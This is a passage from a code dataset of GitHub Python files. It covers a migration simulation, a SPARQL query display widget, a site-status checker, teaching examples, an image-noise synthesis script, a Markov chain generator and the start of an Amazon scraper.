iterable, or mapping of attributes.\n :return: True if... (False otherwise)\n * qry is a string and is a key in this agent's __dict__\n * qry is an iterable and all items in it are keys in this agent's __dict__\n * qry is a mapping and all items in it are in this agent's __dict__\n Note: these checks are done after making the string, iterable items, or keys into python-safe names.\n \"\"\"\n if isinstance(qry, dict):\n qry = {mpi(key): value for key, value in qry.items()}\n return qry.items() <= self.__dict__.items()\n elif isinstance(qry, str): # place above iterable check, since str is iterable\n return mpi(qry) in self.__dict__.keys()\n elif isinstance(qry, Iterable):\n return all(mpi(i) in self.__dict__.keys() for i in qry)\n\n raise TypeError(\n f'qry passed to has_attr should be of type dict, str, or Iterable, but was {type(qry)} instead')\n\n def matches_qry(self, qry):\n \"\"\"\n Determines if this agent matches the given GroupQry.\n If qry.full is True the attributes and relations must be an exact match (not including unique identifiers like\n unique_id and source_name); if False, the qry's attributes and relations need only be a subset of the agent's.\n An agent automatically matches a None qry\n :param qry: A GroupQry namedtuple\n :return: True if the agent matches the qry; False otherwise\n \"\"\"\n\n if not qry:\n return True\n # the code below is REALLY PAINFUL... replacing it with 'return True` makes the code run like 20x faster\n if qry.rel.get('@'):\n qry.rel['pos'] = qry.rel.pop('@')\n\n if qry.full:\n return qry.attr.items() == {k: self.get(k) for k in self._attr}.items() \\\n and qry.rel.items() == {k: self.get(k) for k in self._rel}.items() \\\n and all([fn(self) for fn in qry.cond])\n else:\n return qry.attr.items() <= {k: self.get(k) for k in self._attr}.items() \\\n and qry.rel.items() <= {k: self.get(k) for k in self._rel}.items() \\\n and all([fn(self) for fn in qry.cond])\n\n\nclass ConflictRule:\n \"\"\"\n Conflict causes death and migration. The probability of death scales with the conflict's severity and scale\n while the probability of migration scales with the conflict's scale only. Multipliers for both factors are exposed\n as parameters.\n\n Time of exposure to conflict also increases the probability of death and migration, but that influence isn't\n modeled directly. Instead, a proportion of every group of non-migrating agents can die or migrate at every step of\n the simulation.\n\n Every time a proportion of population is beginning to migrate, the destination site is set and the distance to that\n site use used elewhere to control settlement.\n \"\"\"\n\n def __init__(self, agent):\n self.agent = agent\n self.model = agent.model\n with open(rule_file, 'r') as file:\n j = json.load(file)\n data = next((d for d in j if d['rule_type'] == type(self).\n __name__), {})\n if data:\n gq = data['group_qry']\n if gq:\n data['group_qry'] = GroupQry(gq['attr'], gq['rel'],\n dill.loads(bytes.fromhex(gq['cond'])), gq['full'])\n self.__dict__.update(data)\n\n def apply(self, pop, group, iter, t):\n p_death = self.scale * self.severity * self.severity_death_mult\n p_migration = self.scale * self.scale_migration_mult\n # the definition of sites_dst is unfortunately missed in translation\n # site_dst = random.choice(sites_dst)\n site_dst = random.choice([s for s in pop.grid.G.nodes if s != 'Sudan'])\n _x = pop.random.random()\n if _x < p_death:\n group.set('__void__', True)\n return\n if _x < p_death + p_migration:\n group.set('is-migrating', True)\n group.set('migration-time', 0)\n group.set('travel-time-left', pop.get_attr(site_dst, 'travel-time')\n )\n group.set('site-dst', site_dst)\n return\n else:\n return\n\n def __call__(self):\n if not self.agent.matches_qry(self.group_qry):\n return\n if not self.i:\n self.apply(self.model, self.agent, self.model.time,\n self.model.time)\n elif isinstance(self.i, int) and self.model.time == self.i:\n self.apply(\n self.model, self.agent, self.model.time, self.model.time)\n elif isinstance(self.i, list):\n if self.i[1] == 0 and self.model.time <= self.i[0]:\n self.apply(self\n .model, self.agent, self.model.time, self.model.time)\n elif self.i[0] <= self.model.time <= self.i[1]:\n self.apply(self.\n model, self.agent, self.model.time, self.model.time)\n elif isinstance(self.i, set) and self.model.time in self.i:\n self.apply(\n self.model, self.agent, self.model.time, self.model.time)\n\n\nclass MigrationRule:\n \"\"\"\n Migrating population has a chance of dying and the probability of that happening is proportional to the harshness\n of the environment and the mass of already migrating population. Multipliers for both factors are exposed as\n parameters.\n\n Time of exposure to the environment also increases the probability of death, but that influence isn't modeled\n directly. Instead, a proportion of every group of migrating agents can die at every step of the simulation.\n\n Environmental harshness can be controled via another rule which conditions it on the time of year (e.g., winter\n can be harsher than summer or vice versa depending on region).\n\n A migrating population end to migrate by settling in its destination site.\n \"\"\"\n\n def __init__(self, agent):\n self.agent = agent\n self.model = agent.model\n with open(rule_file, 'r') as file:\n j = json.load(file)\n data = next((d for d in j if d['rule_type'] == type(self).\n __name__), {})\n if data:\n gq = data['group_qry']\n if gq:\n data['group_qry'] = GroupQry(gq['attr'], gq['rel'],\n dill.loads(bytes.fromhex(gq['cond'])), gq['full'])\n self.__dict__.update(data)\n\n def apply(self, pop, group, iter, t):\n if group.has_attr({'travel-time-left': 0}):\n return self.apply_settle(pop, group, iter, t)\n else:\n return self.apply_keep_migrating(pop, group, iter, t)\n\n def apply_keep_migrating(self, pop, group, iter, t):\n migrating_groups = pop.get_groups(pop, GroupQry(cond=[lambda g: g.\n has_attr({'is-migrating': True})]))\n if migrating_groups and len(migrating_groups) > 0:\n migrating_m = len(migrating_groups)\n migrating_p = migrating_m / pop.get_mass(pop, None) * 100\n else:\n migrating_p = 0\n p_death = min(self.env_harshness * self.env_harshness_death_mult +\n migrating_p * self.migration_death_mult, 1.0)\n _x = pop.random.random()\n if _x < p_death:\n group.set('__void__', True)\n return\n else:\n group.set('migration-time', pop.get_attr(group,\n 'migration-time') + 1)\n group.set('travel-time-left', pop.get_attr(group,\n 'travel-time-left') - 1)\n return\n\n def apply_settle(self, pop, group, iter, t):\n group.set('migration-time', pop.get_attr(group, 'migration-time') + 1)\n group.set('is-migrating', False)\n group.set('has-settled', True)\n group.set('@', group.get('site-dst'))\n group.delete('site-dst')\n return\n\n def __call__(self):\n if not self.agent.matches_qry(self.group_qry):\n return\n if not self.i:\n self.apply(self.model, self.agent, self.model.time,\n self.model.time)\n elif isinstance(self.i, int) and self.model.time == self.i:\n self.apply(\n self.model, self.agent, self.model.time, self.model.time)\n elif isinstance(self.i, list):\n if self.i[1] == 0 and self.model.time <= self.i[0]:\n self.apply(self\n .model, self.agent, self.model.time, self.model.time)\n elif self.i[0] <= self.model.time <= self.i[1]:\n self.apply(self.\n model, self.agent, self.model.time, self.model.time)\n elif isinstance(self.i, set) and self.model.time in self.i:\n self.apply(\n self.model, self.agent, self.model.time, self.model.time)\n","repo_name":"evankozierok/pram2mesa","sub_path":"Samples/Migration/Migration/MigrationAgent.py","file_name":"MigrationAgent.py","file_ext":"py","file_size_in_byte":16012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15635351819","text":"import justpy as jp\nimport json\nimport os\nfrom lodstorage.query import Query,QuerySyntaxHighlight, Endpoint\nfrom jpwidgets.bt5widgets import Alert,Collapsible, IconButton\nfrom spreadsheet.spreadsheet import SpreadSheetType, SpreadSheet\nimport spreadsheet\nfrom tabulate import tabulate\nfrom urllib.error import HTTPError\n\nclass QueryDisplay():\n '''\n display queries\n '''\n\n def __init__(self,app,name:str,a,filenameprefix,text,sparql,endpointConf:Endpoint):\n '''\n Args:\n name(str): the name of the display and query\n a(jp.Component): an ancestor component\n filenameprefix(str): the filename prefix to use\n text(str)=the text to display\n endpointConf(Endpoint): SPARQL endpoint configuration to use\n\n '''\n self.app=app\n self.name=name\n self.filenameprefix=filenameprefix\n self.text=text\n self.a=a\n self.sparql=sparql\n self.endpointConf=endpointConf\n self.queryHideShow=Collapsible(name,a=a)\n self.queryHideShow.btn.classes+=\"btn-sm col-3\"\n self.queryDiv=jp.Div(a=self.queryHideShow.body)\n self.queryBar=jp.Div(a=a,classes=\"row\",name=f\"{self.name}QuerBar\")\n self.queryTryIt=jp.Div(a=self.queryBar,classes=\"col-1\")\n self.downloadFormat=\"excel\"\n pass\n \n def generateDownloadFromLod(self,lod) -> str:\n \"\"\"\n generate a download from the given List of Dicts\n \n Args:\n lod(list): the list of Dicts\n \"\"\" \n # prepare static are of webserver to allow uploading files\n static_dir = os.path.dirname(os.path.realpath(__file__))\n qres_dir = f\"{static_dir}/qres\"\n \n os.makedirs(qres_dir, exist_ok=True)\n if self.downloadFormat in [\"excel\",\"ods\",\"csv\"]:\n # convert qres to requested format\n spreadsheetFormat=SpreadSheetType[self.downloadFormat.upper()]\n spreadsheet = SpreadSheet.create(spreadsheetFormat, self.filenameprefix) \n filename = f\"{self.filenameprefix}{spreadsheet.FILE_TYPE}\"\n spreadsheet.addTable(name=self.name, lod=lod)\n spreadsheet.saveToFile(dir_name=qres_dir, fileName=filename)\n else:\n # tabulate \n tablefmt=self.downloadFormat\n if self.downloadFormat==\"json\":\n tableResult=json.dumps(lod)\n else:\n tableResult=tabulate(lod,headers=\"keys\",tablefmt=tablefmt)\n filename= f\"{self.filenameprefix}.{tablefmt}\"\n filepath = f\"{qres_dir}/{filename}\"\n print(tableResult, file=open(filepath, 'w'))\n return filename\n \n async def onChangeDownloadFormat(self,msg:dict):\n '''\n handle the download format change\n '''\n self.downloadFormat = msg.value\n \n async def onDownloadButtonClick(self,_msg):\n '''\n handle the clicking of the download button\n '''\n try:\n alert = Alert(a=self.queryBar, text=f\"Query {self.name} for {self.text} started ... please wait a few seconds\")\n await self.app.wp.update()\n query = getattr(self, \"sparqlQuery\")\n if isinstance(query, Query):\n lod = self.sparql.queryAsListOfDicts(query.query)\n filename = self.generateDownloadFromLod(lod)\n setattr(alert, \"text\", \"Download:\")\n jp.A(text=f\"{filename}\",\n classes=\"\",\n a=alert,\n href=f\"/static/qres/{filename}\",\n download=filename,\n disabled=True)\n except (BaseException,HTTPError) as ex:\n self.app.handleException(ex)\n await self.app.wp.update()\n \n def showDownload(self):\n if getattr(self, \"downloadButton\", None) is None:\n self.downloadButton = IconButton(iconName=\"download\",\n classes=\"btn btn-primary btn-sm col-1\",\n a=self.queryBar,\n click=self.onDownloadButtonClick,\n disabled=False)\n self.selectContainer=jp.Div(a=self.queryBar,classes=\"col-3\")\n self.downloadFormatSelect = self.app.createSelect(\"format\",\n value=self.downloadFormat,\n change=self.onChangeDownloadFormat,\n a=self.selectContainer)\n for downloadFormat in [\"csv\",\"excel\",\"github\",\"html\",\"json\",\"latex\",\"mediawiki\",\"ods\"]:\n self.downloadFormatSelect.add(jp.Option(value=downloadFormat,text=downloadFormat))\n\n\n def showSyntaxHighlightedQuery(self,sparqlQuery,withDownload:bool=True):\n '''\n show a syntax highlighted Query\n\n sparqQuery(str): the query to show\n queryDiv(jp.Div): the div to use for displaying\n queryTryIt(jp.Div): the div for the tryIt button\n '''\n self.sparqlQuery=sparqlQuery\n if withDownload:\n self.showDownload()\n qs=QuerySyntaxHighlight(sparqlQuery)\n queryHigh=qs.highlight()\n tryItUrlEncoded=sparqlQuery.getTryItUrl(baseurl=self.endpointConf.website,database=self.endpointConf.database)\n self.queryDiv.inner_html=queryHigh\n # clear div for try It\n self.queryTryIt.delete_components()\n self.tryItLink=jp.Link(href=tryItUrlEncoded,text=\"try it!\",title=\"try out with wikidata query service\",a=self.queryTryIt,target=\"_blank\")\n \n","repo_name":"WolfgangFahl/pyCEURmake","sub_path":"ceurws/querydisplay.py","file_name":"querydisplay.py","file_ext":"py","file_size_in_byte":5713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15369714501","text":"# coding=utf-8\n###该脚本用于测试蚂蚁pt是否正常工作###\nimport urllib2\nimport urllib\nfrom os import system\nimport SendMail\nimport cookielib\nimport re\n\ndef testError(content):\n \"\"\"\n 测试错误信息\n :param content: bool, True -> Error; False -> No Error\n \"\"\"\n rp = re.compile(\"Memcache\"), re.compile(\"MySql Error\")\n for pt in rp:\n rs = pt.findall(content)\n if rs:\n return True\n else:\n return False\n\ndef dealError(content):\n print('Server Error')\n SendMail.sendErrorInfo(res) # 发送错误数据\n\n# def Init():\n# cj = cookielib.CookieJar()\n# opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\n# urllib2.install_opener(opener)\nurl=\"https://pt.antsoul.com/login.php\"\ntry:\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11' }\n req = urllib2.Request(url, headers = headers)\n res = urllib2.urlopen(req).read().decode(\"UTF-8\") # 返回的数据内容\n # print(res.encode(\"UTF-8\"))\n \n if not testError(res): # 处理错误\n dealError(res)\n else:\n print(\"OK!\")\n\nexcept urllib2.URLError as e:\n print (\"URL ERROR\\n\")\n print (e.reason)\nexcept urllib2.HTTPError as e:\n print (\"HTTP ERROR\")\n print (e.reason)\n\n","repo_name":"WinterXMQ/Script","sub_path":"testantsoul.py","file_name":"testantsoul.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19231273969","text":"# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# Iterable example\n\n\nclass ItemIterator:\n \"\"\"Iterator class\"\"\"\n\n def __init__(self, *args) -> None:\n self.items = args\n self.__current_index = -1\n self.__items_len = len(self.items)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n self.__current_index += 1\n if self.__current_index < self.__items_len:\n return self.items[self.__current_index]\n raise StopIteration\n\n\nclass Items:\n \"\"\"Iterable class\"\"\"\n\n def __init__(self, *args) -> None:\n self.items = args\n\n def __len__(self):\n return len(self.items)\n\n def __iter__(self):\n return ItemIterator(*self.items)\n # return iter(self.items)\n\n\nitems = Items(1, 2, 3, 4, 5)\n\ntry:\n print(f\"Item index [3] is {items[3]}\\n\") # type: ignore\nexcept Exception as e:\n print(e)\n print()\n\nprint(\"Part 1: Iterable Execution returns values\")\n\nfor item in items:\n print(item)\n\nprint(\"\\nPart 2: Iterable Execution returns values agian\")\n\nfor item in items:\n print(item)\n\n# %%\n","repo_name":"aerosadegh/AdvancedPythonTopics","sub_path":"topics/01-class/05.3-Iterable.py","file_name":"05.3-Iterable.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"38399188994","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 22 12:21:10 2019\r\n\r\n@author: Katarzyna Luszczak\r\n\"\"\"\r\n\r\nfrom Plot_Window import Plot_Window\r\n\r\nclass Histogram(Plot_Window):\r\n def __init__(self, data_in, ax_in=None):\r\n super().__init__()\r\n \r\n self.ax = ax_in or self.figure.add_subplot(111)\r\n self.data = data_in\r\n self.color_pt = 'black'\r\n self.plot()\r\n \r\n def plot(self):\r\n self.ax.hist(self.data['Length'], bins=20, range=(0,21), edgecolor='black', linewidth=1.0, normed=1, cumulative=0)\r\n self.ax.set_title('Track length distributrion - measured tracks')\r\n self.ax.set_xlabel('Track length (μm)')\r\n self.ax.set_ylabel('Frequency')\r\n self.ax.set_xlim(0, 20)\r\n self.ax.set_xticks(range(21))","repo_name":"Kasia-Lu/QtTracks","sub_path":"Histogram.py","file_name":"Histogram.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15381499391","text":"\"\"\"\n## CycleISP: Real Image Restoration Via Improved Data Synthesis\n## Syed Waqas Zamir, Aditya Arora, Salman Khan, Munawar Hayat, Fahad Shahbaz Khan, Ming-Hsuan Yang, and Ling Shao\n## CVPR 2020\n## https://arxiv.org/abs/2003.07761\n\"\"\"\n\nimport numpy as np\nimport os\nimport argparse\nfrom tqdm import tqdm\n\nimport torch.nn as nn\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n\nimport scipy.io as sio\nfrom networks.cycleisp import Rgb2Raw\nfrom dataloaders.data_rgb import get_rgb_data\nfrom utils.noise_sampling import random_noise_levels_dnd, random_noise_levels_sidd, add_noise\nimport utils\nimport lycon\nfrom skimage import img_as_ubyte\n\nparser = argparse.ArgumentParser(description='RGB2RAW Network: From clean RGB images, generate {RAW_clean, RAW_noisy} pairs')\nparser.add_argument('--input_dir', default='./datasets/sample_rgb_images/',\n type=str, help='Directory of clean RGB images')\nparser.add_argument('--result_dir', default='./results/synthesized_data/raw/',\n type=str, help='Directory for results')\nparser.add_argument('--weights', default='./pretrained_models/isp/rgb2raw.pth',\n type=str, help='Path to weights')\nparser.add_argument('--gpus', default='0', type=str, help='CUDA_VISIBLE_DEVICES')\nparser.add_argument('--save_images', action='store_true', help='Save synthesized images in result directory')\n\nargs = parser.parse_args()\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n\nutils.mkdir(args.result_dir+'pkl')\nutils.mkdir(args.result_dir+'png/clean')\nutils.mkdir(args.result_dir+'png/noisy')\n\ntest_dataset = get_rgb_data(args.input_dir)\ntest_loader = DataLoader(dataset=test_dataset, batch_size=4, shuffle=False, num_workers=2, drop_last=False)\n\nmodel_rgb2raw = Rgb2Raw()\n\nutils.load_checkpoint(model_rgb2raw,args.weights)\nprint(\"===>Testing using weights: \", args.weights)\n\nmodel_rgb2raw.cuda()\n\nmodel_rgb2raw=nn.DataParallel(model_rgb2raw)\n\nmodel_rgb2raw.eval()\n\nwith torch.no_grad():\n for ii, data in enumerate(tqdm(test_loader), 0):\n rgb_gt = data[0].cuda()\n filenames = data[1]\n padh = data[2]\n padw = data[3]\n ## Convert clean rgb image to clean raw image\n raw_gt = model_rgb2raw(rgb_gt) ## raw_gt is in RGGB format\n raw_gt = torch.clamp(raw_gt,0,1)\n \n ########## Add noise to clean raw images ##########\n for j in range(raw_gt.shape[0]):\n filename = filenames[j]\n shot_noise, read_noise = random_noise_levels_dnd() \n shot_noise, read_noise = shot_noise.cuda(), read_noise.cuda()\n raw_noisy = add_noise(raw_gt[j], shot_noise, read_noise, use_cuda=True)\n raw_noisy = torch.clamp(raw_noisy,0,1) ### CLIP NOISE\n variance = shot_noise * raw_noisy + read_noise\n\n #### Unpadding and saving\n clean_packed = raw_gt[j]\n clean_packed = clean_packed[:,padh[j]//2:-padh[j]//2,padw[j]//2:-padw[j]//2] ## RGGB channels (4 x H/2 x W/2)\n clean_unpacked = utils.unpack_raw(clean_packed.unsqueeze(0)) ## Rearrange RGGB channels into Bayer pattern\n clean_unpacked = clean_unpacked.squeeze().cpu().detach().numpy()\n lycon.save(args.result_dir+'png/clean/'+filename[:-4]+'.png',img_as_ubyte(clean_unpacked))\n\n noisy_packed = raw_noisy\n noisy_packed = noisy_packed[:,padh[j]//2:-padh[j]//2,padw[j]//2:-padw[j]//2] ## RGGB channels\n noisy_unpacked = utils.unpack_raw(noisy_packed.unsqueeze(0)) ## Rearrange RGGB channels into Bayer pattern\n noisy_unpacked = noisy_unpacked.squeeze().cpu().detach().numpy()\n lycon.save(args.result_dir+'png/noisy/'+filename[:-4]+'.png',img_as_ubyte(noisy_unpacked))\n\n variance_packed = variance[:,padh[j]//2:-padh[j]//2,padw[j]//2:-padw[j]//2] ## RGGB channels\n\n dict_ = {}\n dict_['clean'] = clean_packed.cpu().detach().numpy() ## (4 x H/2 x W/2)\n dict_['noisy'] = noisy_packed.cpu().detach().numpy() ## (4 x H/2 x W/2)\n dict_['variance'] = variance_packed.cpu().detach().numpy() ## (4 x H/2 x W/2)\n dict_['shot_noise'] = shot_noise.cpu().detach().numpy()\n dict_['read_noise'] = read_noise.cpu().detach().numpy()\n utils.save_dict(dict_, args.result_dir+'pkl/'+filename[:-4]+'.pkl')\n","repo_name":"swz30/CycleISP","sub_path":"generate_raw_data.py","file_name":"generate_raw_data.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":454,"dataset":"github-code","pt":"52"} +{"seq_id":"34924795754","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sklearn \r\nimport xgboost as xg\r\nimport streamlit as st\r\nfrom sklearn.preprocessing import OneHotEncoder, MinMaxScaler\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.model_selection import StratifiedShuffleSplit, StratifiedKFold\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nst.markdown('', unsafe_allow_html=True)\r\n\r\nst.title(\"Bank Marketing Campaign 🏦\")\r\nst.subheader(\"Predict Either New Customer will subscribed for term Deposit or Not??\")\r\nst.image(\"banking-marketing.jpg\")\r\nst.subheader(\"Enter the Customer Bank Details\")\r\ndf = pd.read_csv(\"bank_data.csv\")\r\n\r\nage = st.number_input(\"Enter the Age \",min_value=0,max_value=100,step=1)\r\njob = st.selectbox(\"Job Type\",('admin.', 'technician', 'services', 'management', 'retired', 'blue-collar',\r\n 'unemployed', 'entrepreneur', 'housemaid', 'unknown', 'self-employed',\r\n 'student'))\r\nmarital = st.selectbox(\"Marital\",('married', 'single', 'divorced'))\r\neducation = st.selectbox(\"Education Type\",('secondary', 'tertiary', 'primary', 'unknown'))\r\ndefault = st.selectbox(\"Has credit in default?\",('yes', 'no'))\r\nbalance = st.slider(\"Enter your Bank Balance(RS) \",min_value=0,max_value=100000,step=10)\r\nhousing = st.selectbox(\"Have Any Housing loan?\",('yes', 'no'))\r\nloan = st.selectbox(\"Have Any Personal loan?\",('yes', 'no'))\r\n\r\nst.subheader(\"Enter Info regarding Current Campaign\")\r\ncontact = st.selectbox(\"Contact Type\",('unknown', 'cellular', 'telephone'))\r\nday = st.slider(\"Enter Day \",min_value=0,max_value=35,step=1)\r\nmonth = st.selectbox(\"Month\",('may',\r\n 'jun',\r\n 'jul',\r\n 'aug',\r\n 'oct',\r\n 'nov',\r\n 'dec',\r\n 'jan',\r\n 'feb',\r\n 'mar',\r\n 'apr',\r\n 'sep'))\r\nduration = st.number_input(\"Call Duration (Sec)\",min_value=0,max_value=10000,step=5)\r\ncampaign = st.slider(\"No of contact performed during this Compaign?\",min_value=0,max_value=30,step=1)\r\nprevious = st.slider(\"No of contact performed in previous Compaign?\",min_value=0,max_value=30,step=1)\r\npoutcome = st.selectbox(\"Outcome of Previous Campaign\",('unknown', 'other', 'failure', 'success'))\r\n\r\nst.write(\"Note: If customer is New for this campaign, poutcome will be unknown & previous contact=0\")\r\nst.write(\"\")\r\n\r\n\r\n#ordinal encoding \r\ndic_bin = {\"yes\":1,\"no\":0}\r\ndic_contact={'unknown': 0, 'cellular': 1, 'telephone': 2}\r\ndic_month={'sep': 0, 'apr': 1, 'mar': 2, 'feb': 3, 'jan': 4, 'dec': 5, 'nov': 6, 'oct': 7, 'aug': 8, 'jul': 9, 'jun': 10, 'may': 11}\r\ndic_poutcome={'success': 0, 'unknown': 1, 'other': 2, 'failure': 3}\r\n\r\n#Train model\r\nX = df.drop('deposit',axis=1)\r\nY = df['deposit']\r\n\r\n#StratifiedShuffleSplit\r\nsss = StratifiedShuffleSplit(n_splits=1,test_size=0.3,random_state=1)\r\nfor train_index,test_index in sss.split(X,Y):\r\n train_df = df.loc[train_index]\r\n test_df = df.loc[test_index]\r\n\r\n#Train and Test dataset\r\nX_train = train_df.drop(\"deposit\",axis=1)\r\nY_train = train_df['deposit']\r\n\r\nX_test = test_df.drop(\"deposit\",axis=1)\r\nY_test = test_df['deposit']\r\n\r\n#Transformer\r\n#Transfoermer1 -- One Hot Encoding\r\ntrf1 = ColumnTransformer([\r\n ('ohe',OneHotEncoder(sparse=False,handle_unknown='ignore'),[1,2,3])\r\n],remainder='passthrough')\r\n\r\n#Transfoermer2 -- Scaling \r\ntrf2 = ColumnTransformer(\r\n transformers=[('scaler', StandardScaler(), [0,-1])],\r\nremainder='passthrough'\r\n)\r\n\r\n#Transofermer 3 -- model \r\ntrf3 = xg.XGBClassifier(n_estimators=80, learning_rate=0.1, gamma=0, subsample=0.75,colsample_bytree=1, max_depth=5)\r\n\r\n#Pipeline\r\npipe = Pipeline([\r\n ('trf1',trf1),\r\n ('trf2',trf2),\r\n ('trf3',trf3)\r\n])\r\n\r\n#Train model with 70% data set\r\npipe.fit(X_train,Y_train)\r\n\r\n#accuracy\r\ny_pred = pipe.predict(X_test)\r\nscore = accuracy_score(Y_test,y_pred)\r\nst.write(score)\r\n\r\n#model prediction from user input\r\n\r\n#convert user input data into binary encode\r\ndefault1 = dic_bin[default]\r\nhousing1 = dic_bin[housing]\r\nloan1 = dic_bin[loan]\r\ncontact1 = dic_contact[contact]\r\nmonth1 = dic_month[month]\r\npoutcome1 = dic_poutcome[poutcome]\r\n\r\n#Predict Complete New Test data\r\n#test_input2 = np.array([25,'blue-collar','married','primary',0, 5000,0,1,1,9,11,921,10,2,2],dtype=object).reshape(1,15)\r\n#Predict Complete New Test data\r\ntest_input = np.array([age,job,marital,education,default1, balance,housing1,loan1,contact1,day,month1,duration,campaign,previous,poutcome1],dtype=object).reshape(1,15)\r\ndf4 = pd.DataFrame(test_input,columns=X_train.columns)\r\n\r\n#predict output\r\nres = pipe.predict(df4)[0]\r\nst.write(res)\r\nst.write(score)\r\n","repo_name":"karanchinch10/Bank-Marketing-Campaign-ML","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36040013349","text":"#############################\n# 马尔科夫链\n# MCM2018 Python 代码模板 SJTU\n# By: Yue Ye\n#############################\n\n# -------------------------------------------------------_____\n# 输入数据的说明及注意事项:\n# 1. 由于马尔科夫链中状态数和长度不定,本程序采用vector进行存储\n# 2. 简单来讲,vector就是一个可变长度的数组,其提供的方法可参阅具体文档\n# 3. C++可视化异常麻烦,如需可视化可使用python或者matlab的代码\n# ------------------------------------------------------------\n\nimport numpy as np\nfrom random import random #\n\n\n# Markov 函数以a和m作为输入参数,m表示过程总状态数\n# a为任意长list,每项的数字代表状态\n# 为效率起见函数无异常检查,请保证a中每一项取值为 [0,m-1]\n# 返回一个m×m矩阵,就是转移矩阵\ndef Markov(a,m):\n res = np.ndarray([m, m])\n n = len(a)\n for i in range(n-1):\n res[a[i],a[i+1]] += 1\n for i in range(m):\n sum = 0\n for j in range(m):\n sum += res[i, j]\n if sum == 0:\n for j in range(m):\n res[i, j] = 1/m\n else:\n for j in range(m):\n res[i, j] /= sum\n\n return res\n\n\n# Generate 函数以trans,n,start作为输入参数,\n# n表示希望生成的马尔科夫过程长度\n# start为初始状态\n# trans为转移矩阵\n# 为效率起见函数无异常检查,请保证转移矩阵行和为1,start是合法状态,n为正\n# 返回生成的马尔科夫过程\ndef Generate(trans,n,start):\n ans = []\n m = len(trans)\n prev = start\n for i in range(n):\n next = m-1\n pos = random()\n for j in range(m-1):\n if pos < trans[prev, j]:\n next = j\n break\n else:\n pos -= trans[prev,j]\n ans.append(next)\n prev = next\n return ans\n\n\nif __name__ == '__main__':\n a = [0,0,1,0,1,1,0,0,0,1,0,1,0,0,1,1,0,0,1,0,1,0,0,0]\n b = a\n t = Markov(b, 2)\n g = Generate(t, 1000000, 0)\n res = Markov(g, 2)\n for i in res:\n for j in i:\n print(j, \" \\n\")\n","repo_name":"KyleYueye/Python-Codes","sub_path":"DGD_index/Markov.py","file_name":"Markov.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36802095731","text":"import requests\nimport queue\nimport random\nfrom lxml import etree\nimport threading\n\ndef find(m,que_root,que_1):\n res = response(m[0])\n lis = res.xpath(\"//ul[@class='a-unordered-list a-nostyle a-vertical a-spacing-base'][1]/ul[1]//li\")\n # ul = res.xpath(\"//span[@class='zg_selected']/../following-sibling::ul[1]/li\")\n if lis:\n for i in lis:\n w = list()\n au1 = 'https://www.amazon.it' + i.xpath(\".//a/@href\")[0]\n w.append(au1)\n w.append(m[1] + '/' + i.xpath(\".//span[contains(@class,'a-size-small')]/text()\")[0])\n que_1.put(w)\n else:\n que_root.put(m)\n print(m)\n return que_root\n\ndef response(url):\n USER_AGENTS_LIST = [\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; 